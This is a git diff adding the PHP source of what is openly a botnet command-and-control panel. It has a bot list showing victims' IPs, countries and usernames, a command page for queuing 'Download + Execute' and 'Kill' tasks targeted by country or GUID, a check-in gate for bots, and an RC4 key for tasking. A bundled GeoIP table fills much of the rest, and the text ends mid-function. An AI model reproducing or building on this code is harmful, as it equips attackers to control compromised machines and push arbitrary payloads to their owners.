diff --git a/panel/Panel.code-workspace b/panel/Panel.code-workspace new file mode 100644 index 0000000..876a149 --- /dev/null +++ b/panel/Panel.code-workspace @@ -0,0 +1,8 @@ +{ + "folders": [ + { + "path": "." + } + ], + "settings": {} +} \ No newline at end of file diff --git a/panel/bots.php b/panel/bots.php new file mode 100644 index 0000000..4f70f67 --- /dev/null +++ b/panel/bots.php @@ -0,0 +1,134 @@ + +
+
Search
+
+ + + + + + + + + + + +
Country:
GUID:
IPv4:
+ + + Order By + + +
+
+
+bindValue(++$i, $country, PDO::PARAM_STR); + } + if($_GET['guids'] != '') + { + foreach($guid as $uhid) + $query->bindValue(++$i, $uhid, PDO::PARAM_STR); + } + if($_GET['ips'] != '') + { + foreach($ips as $ip) + $query->bindValue(++$i, $ip, PDO::PARAM_INT); + } + } + + $query = $db->prepare('SELECT COUNT(*) FROM bots WHERE 1 = 1'.$sqlWhere); + $i = 0; + bind_values(); + $query->execute(); + $total = $query->fetchColumn(); + if($total == 0) + echo('
No bots found
'); + else + { + get_pag_vars($total, $pages, $page, $offset); + $query = $db->prepare('SELECT * FROM bots WHERE 1 = 1'.$sqlWhere.' ORDER BY '.($_GET['order'] == 1 ? 'first_seen' : 'last_seen').' + '.($_GET['dir'] == 1 ? 'ASC' : 'DESC').' LIMIT ? OFFSET ?'); + $i = 0; + bind_values(); + $query->bindValue(++$i, $CONST_PAGE_LIMIT, PDO::PARAM_INT); + $query->bindValue(++$i, $offset, PDO::PARAM_INT); + $query->execute(); +?> +
+
Bots
+ + +fetchAll(); + $geoip = new GeoIP(); + foreach($rows as $row) + { +?> + + + + + + + + + + +'); + echo_pag_form($page, $pages); + echo(''); + } +} +ui_content_end(); +ui_end(); +?> \ No newline at end of file diff --git a/panel/commands.php b/panel/commands.php new file mode 100644 index 0000000..6bca8a7 --- /dev/null +++ b/panel/commands.php @@ -0,0 +1,152 @@ +prepare('DELETE FROM commands WHERE id = ?'); + $query->bindValue(1, $_GET['delete'], PDO::PARAM_INT); + $query->execute(); + header('location: commands.php'); + exit(); +} + +if(isset($_GET['toggle'])) +{ + action_sec_check(); + $query = $db->prepare('UPDATE commands SET enabled = NOT enabled WHERE id = ?'); + $query->bindValue(1, $_GET['toggle'], PDO::PARAM_INT); + $query->execute(); + header('location: commands.php'); + exit(); +} + +if(isset($_POST['type'])) +{ + action_sec_check(); + $query = $db->prepare('INSERT INTO commands (`type`, param, created, `limit`, countries, guids, execs, enabled) + VALUES (?, ?, ?, ?, ?, ?, 0, 0)'); + $query->bindValue(1, $_POST['type'], PDO::PARAM_INT); + $query->bindValue(2, $_POST['param'], PDO::PARAM_STR); + $query->bindValue(3, time(), PDO::PARAM_INT); + $query->bindValue(4, (int) $_POST['limit'], PDO::PARAM_INT); + $query->bindValue(5, $_POST['countries'], PDO::PARAM_STR); + $query->bindValue(6, $_POST['guids'], PDO::PARAM_STR); + $query->execute(); + header('location: commands.php'); + exit(); +} + +function get_command_name($type) +{ + global + $CONST_COMMAND_DL_EXEC, + $CONST_COMMAND_KILL; + switch($type) + { + case $CONST_COMMAND_DL_EXEC: return 'Download + Execute'; + case $CONST_COMMAND_KILL: return 'Kill'; + default: return '?'; + } +} +?> +
+
Add Command
+
+ +
GUIDIPv4CountryOSUsernameLast SeenFirst SeenOptions
('.$geoip->GEOIP_COUNTRY_NAMES[$geoip->GEOIP_COUNTRY_CODE_TO_NUMBER[$row['country']]].')'); ?> + '.time_since($row['last_seen']).''); ?> + + + + + '.time_since($row['first_seen']).''); ?> + + Command +
+ + + + + + + + + + + + + + + + + + + + + +
Type: + +
Execution Limit:
Country Codes:
GUIDs:
Parameter:
+ +
+ +
+prepare($sql); +$stmt->execute(); +if($stmt->rowCount() > 0) +{ +?> +
+
Commands
+ + + + + + + + + + +fetchAll(); + foreach($rows as $row) + { + $emptyHtml = ''; + + if($row['param'] == '') + $param = $emptyHtml; + else + { + $param = htmlspecialchars(substr($row['param'], 0, 30)); + if(strlen($param) < strlen($row['param'])) + $param = ''; + } + echo(' + + + + + + + + '); + } +} +?> +
TypeCreatedCountry CodesGUIDsExecutedParameterOptions
'.get_command_name($row['type']).''.($row['countries'] == '' ? $emptyHtml : htmlspecialchars($row['countries'])).''.($row['guids'] == '' ? $emptyHtml : htmlspecialchars($row['guids'])).''.$row['execs'].' / '.($row['limit'] == 0 ? '∞' : $row['limit']).''.$param.' + + '.($row['enabled'] ? 'Disable' : 'Enable').' + + + + Delete + +
+
+ \ No newline at end of file diff --git a/panel/gate.php b/panel/gate.php new file mode 100644 index 0000000..21fbe34 --- /dev/null +++ b/panel/gate.php @@ -0,0 +1,57 @@ +prepare($sql); + $status = $stmt->execute([$data['guid']]); + + if ($stmt->rowCount() > 0) // bot exists + { + //last command + db_fetch_bot_last_command($db, $data['guid'], $last_command); + db_fetch_tasks($db, $data['guid'], $last_command); + db_update_bot($db, $data['guid'], $ipLong, $country, $last_command); + } + else // new bot + db_add_bot($db, $data['guid'], $ipLong, $data['os'], $data['arch'], $data['username']); +} +?> \ No newline at end of file diff --git a/panel/inc/common.php b/panel/inc/common.php new file mode 100644 index 0000000..cb4c366 --- /dev/null +++ b/panel/inc/common.php @@ -0,0 +1,18 @@ + \ No newline at end of file diff --git a/panel/inc/config.php b/panel/inc/config.php new file mode 100644 index 0000000..6752ec2 --- /dev/null +++ b/panel/inc/config.php @@ -0,0 +1,10 @@ + diff --git a/panel/inc/const.php b/panel/inc/const.php new file mode 100644 index 0000000..a75d778 --- /dev/null +++ b/panel/inc/const.php @@ -0,0 +1,21 @@ + \ No newline at end of file diff --git a/panel/inc/db.php b/panel/inc/db.php new file mode 100644 index 0000000..8029005 --- /dev/null +++ b/panel/inc/db.php @@ -0,0 +1,135 @@ + 'SET NAMES "utf8"')); + } + catch(PDOException $e) + { + if($message) + echo 'Can\'t connect to the database. Change settings?'; + exit(); + } +} + +function db_add_bot($db, $guid, $ip, $os, $arch, $username) +{ + $sql = "INSERT INTO bots (guid, ip, os, arch, country, username, last_seen, first_seen, last_command) VALUES (?, ?, ?, ?, ?, ?, ?, ?, 0)"; + $stmt = $db->prepare($sql); + + $stmt->bindValue(1, $guid, PDO::PARAM_STR); + $stmt->bindValue(2, $ip, PDO::PARAM_INT); + $stmt->bindValue(3, $os, PDO::PARAM_INT); + $stmt->bindValue(4, $arch, PDO::PARAM_INT); + $stmt->bindValue(5, get_country($ip), PDO::PARAM_STR); + $stmt->bindValue(6, $username, PDO::PARAM_STR); + $stmt->bindValue(7, time(), PDO::PARAM_INT); + $stmt->bindValue(8, time(), PDO::PARAM_INT); + + $status = $stmt->execute(); +} + +function db_delete_bot($db, $guid) +{ + $sql = "DELETE FROM bots WHERE guid=?"; + $stmt = $db->prepare($sql); + $stmt->bindValue(1, $guid, PDO::PARAM_STR); + $status = $stmt->execute(); + return $status; +} + +function db_update_bot($db, $guid, $ip, $country, $last_command) +{ + $sql = "UPDATE bots SET last_seen = ?, ip = ?, country = ?, last_command = ? WHERE guid=?"; + $stmt = $db->prepare($sql); + + $stmt->bindValue(1, time(), PDO::PARAM_INT); + $stmt->bindValue(2, $ip, PDO::PARAM_INT); + $stmt->bindValue(3, $country, PDO::PARAM_STR); + $stmt->bindValue(4, $last_command, PDO::PARAM_INT); + $stmt->bindValue(5, $guid, PDO::PARAM_STR); + + $status = $stmt->execute(); +} + +function db_fetch_bot($db, $guid) +{ + $sql = "SELECT guid FROM bots WHERE guid = ?"; + $stmt = $db->prepare($sql); + $stmt->bindValue(1, $guid, PDO::PARAM_STR); + $status = $stmt->execute(); +} + +function db_fetch_bot_last_command($db, $guid, $last_command) +{ + $sql = "SELECT last_command FROM bots WHERE guid = ?"; + $stmt = $db->prepare($sql); + + $stmt->bindValue(1, $guid, PDO::PARAM_STR); + + $status = $stmt->execute(); + if ($stmt->rowCount() === 0) + { + echo '0'; + exit(); + } + + $last_command = $stmt->fetchColumn(); +} + +function db_add_task() +{ + +} + +function db_delete_task() +{ + +} + +function db_fetch_tasks($db, $guid, $last_command) +{ + $sql = "SELECT * FROM commands WHERE (execs < `limit` OR `limit` = 0) AND enabled = 1 AND (id > ? OR ? = 0)"; + $stmt = $db->prepare($sql); + + $stmt->bindValue(1, $last_command, PDO::PARAM_INT); + $stmt->bindValue(2, $last_command, PDO::PARAM_INT); + + $stmt->execute(); + + $rows = $stmt->fetchAll(); + $output = ''; + + foreach ($rows as $row) + { + if ($row['countries'] != '') + { + $countries = explode(' ', $row['countries']); + if (!in_array($country, $countries)) + continue; + } + + if ($row['guids'] != '') + { + $guids = explode(' ', $row['guids']); + if (!in_array($guid, $guids)) + continue; + } + + $sql = "UPDATE commands SET execs = execs + 1 WHERE id = ?"; + $stmt = $db->prepare($sql); + $stmt->bindValue(1, $row['id'], PDO::PARAM_INT); + $stmt->execute(); + $last_command = $row['id']; + $output .= 'COMMAND'.'|'.$row['type'].'|'.$row['param']."\r\n"; + } + + $crypt = RC4($output, "LET_ME_IN!"); + echo $output; +} +?> \ No newline at end of file diff --git a/panel/inc/geoip.dat b/panel/inc/geoip.dat new file mode 100644 index 0000000..be8b031 Binary files /dev/null and b/panel/inc/geoip.dat differ diff --git a/panel/inc/geoip.php b/panel/inc/geoip.php new file mode 100644 index 0000000..54c8d48 --- /dev/null +++ b/panel/inc/geoip.php @@ -0,0 +1,1882 @@ + 0, + "AP" => 1, + "EU" => 2, + "AD" => 3, + "AE" => 4, + "AF" => 5, + "AG" => 6, + "AI" => 7, + "AL" => 8, + "AM" => 9, + "CW" => 10, + "AO" => 11, + "AQ" => 12, + "AR" => 13, + "AS" => 14, + "AT" => 15, + "AU" => 16, + "AW" => 17, + "AZ" => 18, + "BA" => 19, + "BB" => 20, + "BD" => 21, + "BE" => 22, + "BF" => 23, + "BG" => 24, + "BH" => 25, + "BI" => 26, + "BJ" => 27, + "BM" => 28, + "BN" => 29, + "BO" => 30, + "BR" => 31, + "BS" => 32, + "BT" => 33, + "BV" => 34, + "BW" => 35, + "BY" => 36, + "BZ" => 37, + "CA" => 38, + "CC" => 39, + "CD" => 40, + "CF" => 41, + "CG" => 42, + "CH" => 43, + "CI" => 44, + "CK" => 45, + "CL" => 46, + "CM" => 47, + "CN" => 48, + "CO" => 49, + "CR" => 50, + "CU" => 51, + "CV" => 52, + "CX" => 53, + "CY" => 54, + "CZ" => 55, + "DE" => 56, + "DJ" => 57, + "DK" => 58, + "DM" => 59, + "DO" => 60, + "DZ" => 61, + "EC" => 62, + "EE" => 63, + "EG" => 64, + "EH" => 65, + "ER" => 66, + "ES" => 67, + "ET" => 68, + "FI" => 69, + "FJ" => 70, + "FK" => 71, + "FM" => 72, + "FO" => 73, + "FR" => 74, + "SX" => 75, + "GA" => 76, + "GB" => 77, + "GD" => 78, + "GE" => 79, + "GF" => 80, + "GH" => 81, + "GI" => 82, + "GL" => 83, + "GM" => 84, + "GN" => 85, + "GP" => 86, + "GQ" => 87, + "GR" => 88, + "GS" => 89, + "GT" => 90, + "GU" => 91, + "GW" => 92, + "GY" => 93, + "HK" => 94, + "HM" => 95, + "HN" => 96, + "HR" => 97, + "HT" => 98, + "HU" => 99, + "ID" => 100, + "IE" => 101, + "IL" => 102, + "IN" => 103, + "IO" => 104, + "IQ" => 105, + "IR" => 106, + "IS" => 107, + "IT" => 108, + "JM" => 109, + "JO" => 110, + "JP" => 111, + "KE" => 112, + "KG" => 113, + "KH" => 114, + "KI" => 115, + "KM" => 116, + "KN" => 117, + "KP" => 118, + "KR" => 119, + "KW" => 120, + "KY" => 121, + "KZ" => 122, + "LA" => 123, + "LB" => 124, + "LC" => 125, + "LI" => 126, + "LK" => 127, + "LR" => 128, + "LS" => 129, + "LT" => 130, + "LU" => 131, + "LV" => 132, + "LY" => 133, + "MA" => 134, + "MC" => 135, + "MD" => 136, + "MG" => 137, + "MH" => 138, + "MK" => 139, + "ML" => 140, + "MM" => 141, + "MN" => 142, + "MO" => 143, + "MP" => 144, + "MQ" => 145, + "MR" => 146, + "MS" => 147, + "MT" => 148, + "MU" => 149, + "MV" => 150, + "MW" => 151, + "MX" => 152, + "MY" => 153, + "MZ" => 154, + "NA" => 155, + "NC" => 156, + "NE" => 157, + "NF" => 158, + "NG" => 159, + "NI" => 160, + "NL" => 161, + "NO" => 162, + "NP" => 163, + "NR" => 164, + "NU" => 165, + "NZ" => 166, + "OM" => 167, + "PA" => 168, + "PE" => 169, + "PF" => 170, + "PG" => 171, + "PH" => 172, + "PK" => 173, + "PL" => 174, + "PM" => 175, + "PN" => 176, + "PR" => 177, + "PS" => 178, + "PT" => 179, + "PW" => 180, + "PY" => 181, + "QA" => 182, + "RE" => 183, + "RO" => 184, + "RU" => 185, + "RW" => 186, + "SA" => 187, + "SB" => 188, + "SC" => 189, + "SD" => 190, + "SE" => 191, + "SG" => 192, + "SH" => 193, + "SI" => 194, + "SJ" => 195, + "SK" => 196, + "SL" => 197, + "SM" => 198, + "SN" => 199, + "SO" => 200, + "SR" => 201, + "ST" => 202, + "SV" => 203, + "SY" => 204, + "SZ" => 205, + "TC" => 206, + "TD" => 207, + "TF" => 208, + "TG" => 209, + "TH" => 210, + "TJ" => 211, + "TK" => 212, + "TM" => 213, + "TN" => 214, + "TO" => 215, + "TL" => 216, + "TR" => 217, + "TT" => 218, + "TV" => 219, + "TW" => 220, + "TZ" => 221, + "UA" => 222, + "UG" => 223, + "UM" => 224, + "US" => 225, + "UY" => 226, + "UZ" => 227, + "VA" => 228, + "VC" => 229, + "VE" => 230, + "VG" => 231, + "VI" => 232, + "VN" => 233, + "VU" => 234, + "WF" => 235, + "WS" => 236, + "YE" => 237, + "YT" => 238, + "RS" => 239, + "ZA" => 240, + "ZM" => 241, + "ME" => 242, + "ZW" => 243, + "A1" => 244, + "A2" => 245, + "O1" => 246, + "AX" => 247, + "GG" => 248, + "IM" => 249, + "JE" => 250, + "BL" => 251, + "MF" => 252, + "BQ" => 253, + "SS" => 254 + ); + + public $GEOIP_COUNTRY_CODES = array( + "??", + "AP", + "EU", + "AD", + "AE", + "AF", + "AG", + "AI", + "AL", + "AM", + "CW", + "AO", + "AQ", + "AR", + "AS", + "AT", + "AU", + "AW", + "AZ", + "BA", + "BB", + "BD", + "BE", + "BF", + "BG", + "BH", + "BI", + "BJ", + "BM", + "BN", + "BO", + "BR", + "BS", + "BT", + "BV", + "BW", + "BY", + "BZ", + "CA", + "CC", + "CD", + "CF", + "CG", + "CH", + "CI", + "CK", + "CL", + "CM", + "CN", + "CO", + "CR", + "CU", + "CV", + "CX", + "CY", + "CZ", + "DE", + "DJ", + "DK", + "DM", + "DO", + "DZ", + "EC", + "EE", + "EG", + "EH", + "ER", + "ES", + "ET", + "FI", + "FJ", + "FK", + "FM", + "FO", + "FR", + "SX", + "GA", + "GB", + "GD", + "GE", + "GF", + "GH", + "GI", + "GL", + "GM", + "GN", + "GP", + "GQ", + "GR", + "GS", + "GT", + "GU", + "GW", + "GY", + "HK", + "HM", + "HN", + "HR", + "HT", + "HU", + "ID", + "IE", + "IL", + "IN", + "IO", + "IQ", + "IR", + "IS", + "IT", + "JM", + "JO", + "JP", + "KE", + "KG", + "KH", + "KI", + "KM", + "KN", + "KP", + "KR", + "KW", + "KY", + "KZ", + "LA", + "LB", + "LC", + "LI", + "LK", + "LR", + "LS", + "LT", + "LU", + "LV", + "LY", + "MA", + "MC", + "MD", + "MG", + "MH", + "MK", + "ML", + "MM", + "MN", + "MO", + "MP", + "MQ", + "MR", + "MS", + "MT", + "MU", + "MV", + "MW", + "MX", + "MY", + "MZ", + "NA", + "NC", + "NE", + "NF", + "NG", + "NI", + "NL", + "NO", + "NP", + "NR", + "NU", + "NZ", + "OM", + "PA", + "PE", + "PF", + "PG", + "PH", + "PK", + "PL", + "PM", + "PN", + "PR", + "PS", + "PT", + "PW", + "PY", + "QA", + "RE", + "RO", + "RU", + "RW", + "SA", + "SB", + "SC", + "SD", + "SE", + "SG", + "SH", + "SI", + "SJ", + "SK", + "SL", + "SM", + "SN", + "SO", + "SR", + "ST", + "SV", + "SY", + "SZ", + "TC", + "TD", + "TF", + "TG", + "TH", + "TJ", + "TK", + "TM", + "TN", + "TO", + "TL", + "TR", + "TT", + "TV", + "TW", + "TZ", + "UA", + "UG", + "UM", + "US", + "UY", + "UZ", + "VA", + "VC", + "VE", + "VG", + "VI", + "VN", + "VU", + "WF", + "WS", + "YE", + "YT", + "RS", + "ZA", + "ZM", + "ME", + "ZW", + "A1", + "A2", + "O1", + "AX", + "GG", + "IM", + "JE", + "BL", + "MF", + "BQ", + "SS", + "O1" + ); + + public $GEOIP_COUNTRY_CODES3 = array( + "???", + "AP", + "EU", + "AND", + "ARE", + "AFG", + "ATG", + "AIA", + "ALB", + "ARM", + "CUW", + "AGO", + "ATA", + "ARG", + "ASM", + "AUT", + "AUS", + "ABW", + "AZE", + "BIH", + "BRB", + "BGD", + "BEL", + "BFA", + "BGR", + "BHR", + "BDI", + "BEN", + "BMU", + "BRN", + "BOL", + "BRA", + "BHS", + "BTN", + "BVT", + "BWA", + "BLR", + "BLZ", + "CAN", + "CCK", + "COD", + "CAF", + "COG", + "CHE", + "CIV", + "COK", + "CHL", + "CMR", + "CHN", + "COL", + "CRI", + "CUB", + "CPV", + "CXR", + "CYP", + "CZE", + "DEU", + "DJI", + "DNK", + "DMA", + "DOM", + "DZA", + "ECU", + "EST", + "EGY", + "ESH", + "ERI", + "ESP", + "ETH", + "FIN", + "FJI", + "FLK", + "FSM", + "FRO", + "FRA", + "SXM", + "GAB", + "GBR", + "GRD", + "GEO", + "GUF", + "GHA", + "GIB", + "GRL", + "GMB", + "GIN", + "GLP", + "GNQ", + "GRC", + "SGS", + "GTM", + "GUM", + "GNB", + "GUY", + "HKG", + "HMD", + "HND", + "HRV", + "HTI", + "HUN", + "IDN", + "IRL", + "ISR", + "IND", + "IOT", + "IRQ", + "IRN", + "ISL", + "ITA", + "JAM", + "JOR", + "JPN", + "KEN", + "KGZ", + "KHM", + "KIR", + "COM", + "KNA", + "PRK", + "KOR", + "KWT", + "CYM", + "KAZ", + "LAO", + "LBN", + "LCA", + "LIE", + "LKA", + "LBR", + "LSO", + "LTU", + "LUX", + "LVA", + "LBY", + "MAR", + "MCO", + "MDA", + "MDG", + "MHL", + "MKD", + "MLI", + "MMR", + "MNG", + "MAC", + "MNP", + "MTQ", + "MRT", + "MSR", + "MLT", + "MUS", + "MDV", + "MWI", + "MEX", + "MYS", + "MOZ", + "NAM", + "NCL", + "NER", + "NFK", + "NGA", + "NIC", + "NLD", + "NOR", + "NPL", + "NRU", + "NIU", + "NZL", + "OMN", + "PAN", + "PER", + "PYF", + "PNG", + "PHL", + "PAK", + "POL", + "SPM", + "PCN", + "PRI", + "PSE", + "PRT", + "PLW", + "PRY", + "QAT", + "REU", + "ROU", + "RUS", + "RWA", + "SAU", + "SLB", + "SYC", + "SDN", + "SWE", + "SGP", + "SHN", + "SVN", + "SJM", + "SVK", + "SLE", + "SMR", + "SEN", + "SOM", + "SUR", + "STP", + "SLV", + "SYR", + "SWZ", + "TCA", + "TCD", + "ATF", + "TGO", + "THA", + "TJK", + "TKL", + "TKM", + "TUN", + "TON", + "TLS", + "TUR", + "TTO", + "TUV", + "TWN", + "TZA", + "UKR", + "UGA", + "UMI", + "USA", + "URY", + "UZB", + "VAT", + "VCT", + "VEN", + "VGB", + "VIR", + "VNM", + "VUT", + "WLF", + "WSM", + "YEM", + "MYT", + "SRB", + "ZAF", + "ZMB", + "MNE", + "ZWE", + "A1", + "A2", + "O1", + "ALA", + "GGY", + "IMN", + "JEY", + "BLM", + "MAF", + "BES", + "SSD", + "O1" + ); + + public $GEOIP_COUNTRY_NAMES = array( + "Unknown", + "Asia/Pacific Region", + "Europe", + "Andorra", + "United Arab Emirates", + "Afghanistan", + "Antigua and Barbuda", + "Anguilla", + "Albania", + "Armenia", + "Curacao", + "Angola", + "Antarctica", + "Argentina", + "American Samoa", + "Austria", + "Australia", + "Aruba", + "Azerbaijan", + "Bosnia and Herzegovina", + "Barbados", + "Bangladesh", + "Belgium", + "Burkina Faso", + "Bulgaria", + "Bahrain", + "Burundi", + "Benin", + "Bermuda", + "Brunei Darussalam", + "Bolivia", + "Brazil", + "Bahamas", + "Bhutan", + "Bouvet Island", + "Botswana", + "Belarus", + "Belize", + "Canada", + "Cocos (Keeling) Islands", + "Congo, The Democratic Republic of the", + "Central African Republic", + "Congo", + "Switzerland", + "Cote D'Ivoire", + "Cook Islands", + "Chile", + "Cameroon", + "China", + "Colombia", + "Costa Rica", + "Cuba", + "Cape Verde", + "Christmas Island", + "Cyprus", + "Czech Republic", + "Germany", + "Djibouti", + "Denmark", + "Dominica", + "Dominican Republic", + "Algeria", + "Ecuador", + "Estonia", + "Egypt", + "Western Sahara", + "Eritrea", + "Spain", + "Ethiopia", + "Finland", + "Fiji", + "Falkland Islands (Malvinas)", + "Micronesia, Federated States of", + "Faroe Islands", + "France", + "Sint Maarten (Dutch part)", + "Gabon", + "United Kingdom", + "Grenada", + "Georgia", + "French Guiana", + "Ghana", + "Gibraltar", + "Greenland", + "Gambia", + "Guinea", + "Guadeloupe", + "Equatorial Guinea", + "Greece", + "South Georgia and the South Sandwich Islands", + "Guatemala", + "Guam", + "Guinea-Bissau", + "Guyana", + "Hong Kong", + "Heard Island and McDonald Islands", + "Honduras", + "Croatia", + "Haiti", + "Hungary", + "Indonesia", + "Ireland", + "Israel", + "India", + "British Indian Ocean Territory", + "Iraq", + "Iran, Islamic Republic of", + "Iceland", + "Italy", + "Jamaica", + "Jordan", + "Japan", + "Kenya", + "Kyrgyzstan", + "Cambodia", + "Kiribati", + "Comoros", + "Saint Kitts and Nevis", + "Korea, Democratic People's Republic of", + "Korea, Republic of", + "Kuwait", + "Cayman Islands", + "Kazakhstan", + "Lao People's Democratic Republic", + "Lebanon", + "Saint Lucia", + "Liechtenstein", + "Sri Lanka", + "Liberia", + "Lesotho", + "Lithuania", + "Luxembourg", + "Latvia", + "Libya", + "Morocco", + "Monaco", + "Moldova, Republic of", + "Madagascar", + "Marshall Islands", + "Macedonia", + "Mali", + "Myanmar", + "Mongolia", + "Macau", + "Northern Mariana Islands", + "Martinique", + "Mauritania", + "Montserrat", + "Malta", + "Mauritius", + "Maldives", + "Malawi", + "Mexico", + "Malaysia", + "Mozambique", + "Namibia", + "New Caledonia", + "Niger", + "Norfolk Island", + "Nigeria", + "Nicaragua", + "Netherlands", + "Norway", + "Nepal", + "Nauru", + "Niue", + "New Zealand", + "Oman", + "Panama", + "Peru", + "French Polynesia", + "Papua New Guinea", + "Philippines", + "Pakistan", + "Poland", + "Saint Pierre and Miquelon", + "Pitcairn Islands", + "Puerto Rico", + "Palestinian Territory", + "Portugal", + "Palau", + "Paraguay", + "Qatar", + "Reunion", + "Romania", + "Russian Federation", + "Rwanda", + "Saudi Arabia", + "Solomon Islands", + "Seychelles", + "Sudan", + "Sweden", + "Singapore", + "Saint Helena", + "Slovenia", + "Svalbard and Jan Mayen", + "Slovakia", + "Sierra Leone", + "San Marino", + "Senegal", + "Somalia", + "Suriname", + "Sao Tome and Principe", + "El Salvador", + "Syrian Arab Republic", + "Swaziland", + "Turks and Caicos Islands", + "Chad", + "French Southern Territories", + "Togo", + "Thailand", + "Tajikistan", + "Tokelau", + "Turkmenistan", + "Tunisia", + "Tonga", + "Timor-Leste", + "Turkey", + "Trinidad and Tobago", + "Tuvalu", + "Taiwan", + "Tanzania, United Republic of", + "Ukraine", + "Uganda", + "United States Minor Outlying Islands", + "United States", + "Uruguay", + "Uzbekistan", + "Holy See (Vatican City State)", + "Saint Vincent and the Grenadines", + "Venezuela", + "Virgin Islands, British", + "Virgin Islands, U.S.", + "Vietnam", + "Vanuatu", + "Wallis and Futuna", + "Samoa", + "Yemen", + "Mayotte", + "Serbia", + "South Africa", + "Zambia", + "Montenegro", + "Zimbabwe", + "Anonymous Proxy", + "Satellite Provider", + "Other", + "Aland Islands", + "Guernsey", + "Isle of Man", + "Jersey", + "Saint Barthelemy", + "Saint Martin", + "Bonaire, Saint Eustatius and Saba", + "South Sudan", + "Other" + ); + + public $GEOIP_CONTINENT_CODES = array( + "--", + "AS", + "EU", + "EU", + "AS", + "AS", + "NA", + "NA", + "EU", + "AS", + "NA", + "AF", + "AN", + "SA", + "OC", + "EU", + "OC", + "NA", + "AS", + "EU", + "NA", + "AS", + "EU", + "AF", + "EU", + "AS", + "AF", + "AF", + "NA", + "AS", + "SA", + "SA", + "NA", + "AS", + "AN", + "AF", + "EU", + "NA", + "NA", + "AS", + "AF", + "AF", + "AF", + "EU", + "AF", + "OC", + "SA", + "AF", + "AS", + "SA", + "NA", + "NA", + "AF", + "AS", + "AS", + "EU", + "EU", + "AF", + "EU", + "NA", + "NA", + "AF", + "SA", + "EU", + "AF", + "AF", + "AF", + "EU", + "AF", + "EU", + "OC", + "SA", + "OC", + "EU", + "EU", + "NA", + "AF", + "EU", + "NA", + "AS", + "SA", + "AF", + "EU", + "NA", + "AF", + "AF", + "NA", + "AF", + "EU", + "AN", + "NA", + "OC", + "AF", + "SA", + "AS", + "AN", + "NA", + "EU", + "NA", + "EU", + "AS", + "EU", + "AS", + "AS", + "AS", + "AS", + "AS", + "EU", + "EU", + "NA", + "AS", + "AS", + "AF", + "AS", + "AS", + "OC", + "AF", + "NA", + "AS", + "AS", + "AS", + "NA", + "AS", + "AS", + "AS", + "NA", + "EU", + "AS", + "AF", + "AF", + "EU", + "EU", + "EU", + "AF", + "AF", + "EU", + "EU", + "AF", + "OC", + "EU", + "AF", + "AS", + "AS", + "AS", + "OC", + "NA", + "AF", + "NA", + "EU", + "AF", + "AS", + "AF", + "NA", + "AS", + "AF", + "AF", + "OC", + "AF", + "OC", + "AF", + "NA", + "EU", + "EU", + "AS", + "OC", + "OC", + "OC", + "AS", + "NA", + "SA", + "OC", + "OC", + "AS", + "AS", + "EU", + "NA", + "OC", + "NA", + "AS", + "EU", + "OC", + "SA", + "AS", + "AF", + "EU", + "EU", + "AF", + "AS", + "OC", + "AF", + "AF", + "EU", + "AS", + "AF", + "EU", + "EU", + "EU", + "AF", + "EU", + "AF", + "AF", + "SA", + "AF", + "NA", + "AS", + "AF", + "NA", + "AF", + "AN", + "AF", + "AS", + "AS", + "OC", + "AS", + "AF", + "OC", + "AS", + "EU", + "NA", + "OC", + "AS", + "AF", + "EU", + "AF", + "OC", + "NA", + "SA", + "AS", + "EU", + "NA", + "SA", + "NA", + "NA", + "AS", + "OC", + "OC", + "OC", + "AS", + "AF", + "EU", + "AF", + "AF", + "EU", + "AF", + "--", + "--", + "--", + "EU", + "EU", + "EU", + "EU", + "NA", + "NA", + "NA", + "AF", + "--" + ); +} + +function geoip_load_shared_mem($file) +{ + $fp = fopen($file, "rb"); + if (!$fp) { + print "error opening $file: $php_errormsg\n"; + exit; + } + $s_array = fstat($fp); + $size = $s_array['size']; + if (($shmid = @shmop_open(GEOIP_SHM_KEY, "w", 0, 0))) { + shmop_delete($shmid); + shmop_close($shmid); + } + $shmid = shmop_open(GEOIP_SHM_KEY, "c", 0644, $size); + shmop_write($shmid, fread($fp, $size), 0); + shmop_close($shmid); +} + +function _setup_segments($gi) +{ + $gi->databaseType = GEOIP_COUNTRY_EDITION; + $gi->record_length = STANDARD_RECORD_LENGTH; + if ($gi->flags & GEOIP_SHARED_MEMORY) { + $offset = @shmop_size($gi->shmid) - 3; + for ($i = 0; $i < STRUCTURE_INFO_MAX_SIZE; $i++) { + $delim = @shmop_read($gi->shmid, $offset, 3); + $offset += 3; + if ($delim == (chr(255) . chr(255) . chr(255))) { + $gi->databaseType = ord(@shmop_read($gi->shmid, $offset, 1)); + if ($gi->databaseType >= 106) { + $gi->databaseType -= 105; + } + $offset++; + + if ($gi->databaseType == GEOIP_REGION_EDITION_REV0) { + $gi->databaseSegments = GEOIP_STATE_BEGIN_REV0; + } elseif ($gi->databaseType == GEOIP_REGION_EDITION_REV1) { + $gi->databaseSegments = GEOIP_STATE_BEGIN_REV1; + } elseif (($gi->databaseType == GEOIP_CITY_EDITION_REV0) + || ($gi->databaseType == GEOIP_CITY_EDITION_REV1) + || ($gi->databaseType == GEOIP_ORG_EDITION) + || ($gi->databaseType == GEOIP_ORG_EDITION_V6) + || ($gi->databaseType == GEOIP_DOMAIN_EDITION) + || ($gi->databaseType == GEOIP_DOMAIN_EDITION_V6) + || ($gi->databaseType == GEOIP_ISP_EDITION) + || ($gi->databaseType == GEOIP_ISP_EDITION_V6) + || ($gi->databaseType == GEOIP_USERTYPE_EDITION) + || ($gi->databaseType == GEOIP_USERTYPE_EDITION_V6) + || ($gi->databaseType == GEOIP_LOCATIONA_EDITION) + || ($gi->databaseType == GEOIP_ACCURACYRADIUS_EDITION) + || ($gi->databaseType == GEOIP_CITY_EDITION_REV0_V6) + || ($gi->databaseType == GEOIP_CITY_EDITION_REV1_V6) + || ($gi->databaseType == GEOIP_NETSPEED_EDITION_REV1) + || ($gi->databaseType == GEOIP_NETSPEED_EDITION_REV1_V6) + || ($gi->databaseType == GEOIP_ASNUM_EDITION) + || ($gi->databaseType == GEOIP_ASNUM_EDITION_V6) + ) { + $gi->databaseSegments = 0; + $buf = @shmop_read($gi->shmid, $offset, SEGMENT_RECORD_LENGTH); + for ($j = 0; $j < SEGMENT_RECORD_LENGTH; $j++) { + $gi->databaseSegments += (ord($buf[$j]) << ($j * 8)); + } + if (($gi->databaseType == GEOIP_ORG_EDITION) + || ($gi->databaseType == GEOIP_ORG_EDITION_V6) + || ($gi->databaseType == GEOIP_DOMAIN_EDITION) + || ($gi->databaseType == GEOIP_DOMAIN_EDITION_V6) + || ($gi->databaseType == GEOIP_ISP_EDITION) + || ($gi->databaseType == GEOIP_ISP_EDITION_V6) + ) { + 